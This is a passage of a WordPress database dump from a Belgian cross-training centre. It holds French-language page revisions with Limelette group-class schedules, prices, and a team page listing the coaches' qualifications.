(400, 2, '2013-11-14 22:19:40', '2013-11-14 22:19:40', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 3 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous!\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1></h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-14 22:19:40', '2013-11-14 22:19:40', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(398, 1, '2013-11-14 21:33:20', '2013-11-14 21:33:20', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n<br>\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous! \r\n<br>\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-14 21:33:20', '2013-11-14 21:33:20', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(401, 1, '2013-11-24 08:34:58', '2013-11-24 08:34:58', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 3 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous!\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-24 08:34:58', '2013-11-24 08:34:58', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(402, 1, '2013-11-24 08:40:03', '2013-11-24 08:40:03', '', 'julie_rogge_pti', '', 'inherit', 'open', 'open', '', 'julie_rogge_pti', '', '', '2013-11-24 08:40:03', '2013-11-24 08:40:03', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/julie_rogge_pti.jpg', 0, 'attachment', 'image/jpeg', 0),
(403, 1, '2013-11-24 08:40:22', '2013-11-24 08:40:22', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-402\" alt=\"julie_rogge_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/julie_rogge_pti.jpg\" width=\"198\" height=\"254\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-11-24 08:40:22', '2013-11-24 08:40:22', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(404, 1, '2013-11-24 08:41:15', '2013-11-24 08:41:15', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div 